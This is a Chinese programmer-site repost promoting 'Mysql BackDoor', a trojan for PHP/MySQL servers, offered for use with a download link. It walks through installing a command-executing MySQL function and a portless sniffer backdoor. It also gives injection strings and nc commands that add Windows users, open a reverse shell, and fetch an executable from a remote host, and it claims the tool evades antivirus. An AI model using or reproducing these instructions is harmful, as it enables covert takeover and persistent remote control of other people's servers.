欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Mysql BackDoorDoor(图)

程序员文章站 2024-01-03 23:31:34
Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地... 08-10-08...

mysql backdoor是一款针对php mysql服务器开发的后门,后门安装后为mysql增加一个可以执行系统命令的"state"函数,并且随 mysql进程启动一个基于dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在winxp、 win2003 mysql5.0.x下通过.
[安装]
将mysql.php传到php服务器上,依填上相应的host、user、password、db后,点击"自动安装mysql backdoor"
安装成功后,mysql上便会增加一个"state"函数,同时利用mysql进程运行一个基于嗅探的后门. 这个后门在windows下拥有与mysql一样的系统权限.
[使用state函数]
state函数实际是一个和php的”system()”功能相同的函数,可以用来执行系统命令.在”请输入sql命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行sql语句”后,便会得到运行结果.
[使用基于sniff的后门]
有了state函数,即使webshell丢了,只要服务器上有sql注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于sniff的后门控制服务器.向服务器开放的任意端口发送 以"mysql-"开头的数据包,便能调用这个sniff的后门,如:
1.运行系统命令: nc ip 80->回车->mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
[卸载]
在mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常。
详细用法看压缩包内图文说明。http://blogimg.chinaunix.net/blog/upfile2/080712123321.rar
注意:能过杀毒软件,但过不了主动防御,主动防御太狠了,后门执行系统命令、发邮件、反向连接都会被发现。
发送mysql-cmd c net user abc add,mysql backdoor运行cmd命令便会被主动防御截获:
Mysql BackDoorDoor(图)
发送mysql-c-,mysql bookdoor运行管道重定向便会被主动防御截获,可见卡巴斯基监视了内存或句柄表:
Mysql BackDoorDoor(图)

上一篇:

下一篇: